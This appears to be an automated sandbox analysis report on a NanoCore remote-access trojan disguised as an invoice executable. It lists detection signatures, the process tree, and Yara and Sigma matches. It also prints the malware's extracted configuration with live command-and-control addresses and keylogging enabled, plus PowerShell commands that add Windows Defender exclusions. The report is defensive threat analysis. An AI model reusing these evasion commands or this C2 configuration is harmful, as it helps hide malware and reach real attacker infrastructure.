Loading ...

Play interactive tourEdit tour

Analysis Report CN-Invoice-XXXXX9808-19011143287989.exe

Overview

General Information

Sample Name:CN-Invoice-XXXXX9808-19011143287989.exe
Analysis ID:358399
MD5:6ecb42a8b14658cd4ee39d5e09b103f5
SHA1:f1de55b6def8aadd6cfe7afccb230cf288ad23dd
SHA256:6239f3411c5abb060b14d248c7408eacc2c02c0653ed10ac533177675220aed7
Tags:exeNanoCoresigned
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
System process connects to network (likely due to code injection or exploit)
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Drops PE files with benign system names
Executable has a suspicious name (potential lure to open the executable)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Tries to delay execution (extensive OutputDebugStringW loop)
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to detect virtual machines (SIDT)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • CN-Invoice-XXXXX9808-19011143287989.exe (PID: 3236 cmdline: 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' MD5: 6ECB42A8B14658CD4EE39D5E09B103F5)
    • powershell.exe (PID: 4708 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AdvancedRun.exe (PID: 4716 cmdline: 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 1680 cmdline: 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe' /SpecialRun 4101d8 4716 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 4924 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6072 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 3332 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • CasPol.exe (PID: 580 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
    • CasPol.exe (PID: 3456 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
    • CasPol.exe (PID: 4092 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
    • CasPol.exe (PID: 5436 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
    • CasPol.exe (PID: 5664 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
    • WerFault.exe (PID: 5196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 2232 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • explorer.exe (PID: 1528 cmdline: 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 5880 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 4864 cmdline: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' MD5: 6ECB42A8B14658CD4EE39D5E09B103F5)
  • svchost.exe (PID: 5756 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 5276 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3236 -ip 3236 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • explorer.exe (PID: 5964 cmdline: 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 4440 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 724 cmdline: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' MD5: 6ECB42A8B14658CD4EE39D5E09B103F5)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "5c958888-f81c-42a4-939d-31983a2cd9ba", "Group": "wuzzy122", "Domain1": "185.157.160.233", "Domain2": "annapro.linkpc.net", "Port": 2212, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.1641837580.00000000052A0000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xe75:$x1: NanoCore.ClientPluginHost
  • 0xe8f:$x2: IClientNetworkHost
00000012.00000002.1641837580.00000000052A0000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xe75:$x2: NanoCore.ClientPluginHost
  • 0x1261:$s3: PipeExists
  • 0x1136:$s4: PipeCreated
  • 0xeb0:$s5: IClientLoggingHost
00000012.00000002.1639236864.0000000003DF9000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000012.00000002.1639236864.0000000003DF9000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x2f25:$a: NanoCore
    • 0x2f7e:$a: NanoCore
    • 0x2fbb:$a: NanoCore
    • 0x3034:$a: NanoCore
    • 0x166df:$a: NanoCore
    • 0x166f4:$a: NanoCore
    • 0x16729:$a: NanoCore
    • 0x2f1ab:$a: NanoCore
    • 0x2f1c0:$a: NanoCore
    • 0x2f1f5:$a: NanoCore
    • 0x2f87:$b: ClientPlugin
    • 0x2fc4:$b: ClientPlugin
    • 0x38c2:$b: ClientPlugin
    • 0x38cf:$b: ClientPlugin
    • 0x1649b:$b: ClientPlugin
    • 0x164b6:$b: ClientPlugin
    • 0x164e6:$b: ClientPlugin
    • 0x166fd:$b: ClientPlugin
    • 0x16732:$b: ClientPlugin
    • 0x2ef67:$b: ClientPlugin
    • 0x2ef82:$b: ClientPlugin
    00000012.00000002.1643028705.0000000005540000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xf7ad:$x1: NanoCore.ClientPluginHost
    • 0xf7da:$x2: IClientNetworkHost
    Click to see the 11 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    18.2.CasPol.exe.400000.0.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    18.2.CasPol.exe.400000.0.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0xff05:$x1: NanoCore Client.exe
    • 0x1018d:$x2: NanoCore.ClientPluginHost
    • 0x117c6:$s1: PluginCommand
    • 0x117ba:$s2: FileCommand
    • 0x1266b:$s3: PipeExists
    • 0x18422:$s4: PipeCreated
    • 0x101b7:$s5: IClientLoggingHost
    18.2.CasPol.exe.400000.0.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      18.2.CasPol.exe.400000.0.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0xfef5:$a: NanoCore
      • 0xff05:$a: NanoCore
      • 0x10139:$a: NanoCore
      • 0x1014d:$a: NanoCore
      • 0x1018d:$a: NanoCore
      • 0xff54:$b: ClientPlugin
      • 0x10156:$b: ClientPlugin
      • 0x10196:$b: ClientPlugin
      • 0x1007b:$c: ProjectData
      • 0x10a82:$d: DESCrypto
      • 0x1844e:$e: KeepAlive
      • 0x1643c:$g: LogClientMessage
      • 0x12637:$i: get_Connected
      • 0x10db8:$j: #=q
      • 0x10de8:$j: #=q
      • 0x10e04:$j: #=q
      • 0x10e34:$j: #=q
      • 0x10e50:$j: #=q
      • 0x10e6c:$j: #=q
      • 0x10e9c:$j: #=q
      • 0x10eb8:$j: #=q
      18.2.CasPol.exe.5544629.8.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xb184:$x1: NanoCore.ClientPluginHost
      • 0xb1b1:$x2: IClientNetworkHost
      Click to see the 30 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 5664, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
      Sigma detected: Executables Started in Suspicious FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, NewProcessName: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, OriginalFileName: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5880, ProcessCommandLine: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , ProcessId: 4864
      Sigma detected: Execution in Non-Executable FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, NewProcessName: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, OriginalFileName: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5880, ProcessCommandLine: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , ProcessId: 4864
      Sigma detected: Suspicious Program Location Process StartsShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, NewProcessName: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, OriginalFileName: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5880, ProcessCommandLine: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , ProcessId: 4864
      Sigma detected: Suspicious Svchost ProcessShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, NewProcessName: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, OriginalFileName: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5880, ProcessCommandLine: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , ProcessId: 4864
      Sigma detected: System File Execution Location AnomalyShow sources
      Source: Process startedAuthor: Florian Roth, Patrick Bareiss: Data: Command: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, NewProcessName: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, OriginalFileName: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5880, ProcessCommandLine: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , ProcessId: 4864
      Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
      Source: Process startedAuthor: vburov: Data: Command: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, NewProcessName: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, OriginalFileName: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5880, ProcessCommandLine: 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' , ProcessId: 4864

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000012.00000002.1639236864.0000000003DF9000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "5c958888-f81c-42a4-939d-31983a2cd9ba", "Group": "wuzzy122", "Domain1": "185.157.160.233", "Domain2": "annapro.linkpc.net", "Port": 2212, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeReversingLabs: Detection: 38%
      Multi AV Scanner detection for submitted fileShow sources
      Source: CN-Invoice-XXXXX9808-19011143287989.exeReversingLabs: Detection: 29%
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000012.00000002.1639236864.0000000003DF9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.1643028705.0000000005540000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.1611766300.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 3236, type: MEMORY
      Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.5544629.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.3dfff7c.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.3dfff7c.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.3e045a5.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.5540000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.3dfb146.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.5540000.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.raw.unpack, type: UNPACKEDPE
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeJoe Sandbox ML: detected
      Machine Learning detection for sampleShow sources
      Source: CN-Invoice-XXXXX9808-19011143287989.exeJoe Sandbox ML: detected
      Source: 18.2.CasPol.exe.5540000.9.unpackAvira: Label: TR/NanoCore.fadte

      Compliance:

      barindex
      Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
      Source: CN-Invoice-XXXXX9808-19011143287989.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Binary contains paths to debug symbolsShow sources
      Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1529847486.00000000015F3000.00000004.00000020.sdmp
      Source: Binary string: System.ni.pdb% source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: ml.pdbLL source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: System.ni.pdb" source: WerFault.exe, 00000016.00000003.1421437709.0000000000EF0000.00000004.00000040.sdmp
      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000016.00000003.1381082381.0000000004DDE000.00000004.00000001.sdmp
      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000016.00000003.1421437709.0000000000EF0000.00000004.00000040.sdmp
      Source: Binary string: profapi.pdb[8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000016.00000003.1420512737.0000000005141000.00000004.00000001.sdmp
      Source: Binary string: rsaenh.pdbu8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000016.00000003.1420512737.0000000005141000.00000004.00000001.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb4 source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1529847486.00000000015F3000.00000004.00000020.sdmp
      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000016.00000003.1384536651.0000000000CC7000.00000004.00000001.sdmp
      Source: Binary string: ml.pdb source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: winnsi.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: .ni.pdb source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: clr.pdb source: WerFault.exe, 00000016.00000003.1421437709.0000000000EF0000.00000004.00000040.sdmp
      Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Windows.Forms.pdb" source: WerFault.exe, 00000016.00000003.1421437709.0000000000EF0000.00000004.00000040.sdmp
      Source: Binary string: ility.pdb source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000016.00000003.1420512737.0000000005141000.00000004.00000001.sdmp
      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000016.00000003.1420512737.0000000005141000.00000004.00000001.sdmp
      Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 00000016.00000003.1420366383.0000000000EF1000.00000004.00000040.sdmp
      Source: Binary string: clrjit.pdbC8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: fltLib.pdb!8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: WinTypes.pdbo source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: rtutils.pdb3 source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: ole32.pdb-8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: urlmon.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: CN-Invoice-XXXXX9808-19011143287989.PDB source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1502896240.0000000001357000.00000004.00000010.sdmp
      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000016.00000003.1379876265.0000000000CD9000.00000004.00000001.sdmp
      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000016.00000003.1419588533.0000000000EF2000.00000004.00000040.sdmp
      Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687310463.0000000006A90000.00000004.00000001.sdmp
      Source: Binary string: System.ni.pdbT3sl source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: System.Xml.pdbx source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbX source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1529847486.00000000015F3000.00000004.00000020.sdmp
      Source: Binary string: msasn1.pdb} source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: mscoree.pdb source: WerFault.exe, 00000016.00000003.1420512737.0000000005141000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.PDB5 source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1502896240.0000000001357000.00000004.00000010.sdmp
      Source: Binary string: dwmapi.pdbi8 source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: mscorlib.pdbC source: WerFault.exe, 00000016.00000003.1419804430.0000000005159000.00000004.00000001.sdmp
      Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdbMI[)X) source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687310463.0000000006A90000.00000004.00000001.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687310463.0000000006A90000.00000004.00000001.sdmp
      Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000016.00000003.1419588533.0000000000EF2000.00000004.00000040.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb' source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687310463.0000000006A90000.00000004.00000001.sdmp
      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: wmswsock.pdb) source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: nsi.pdb source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: ntmarta.pdb{ source: WerFault.exe, 00000016.00000003.1419452776.0000000000EFE000.00000004.00000040.sdmp
      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
      Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000016.00000002.1497606961.0000000005320000.00000004.00000001.sdmp
      Source: Binary string: ole32.pdb source: WerFault.exe, 00000016.00000003.1421352425.0000000000EFA000.00000004.00000040.sdmp
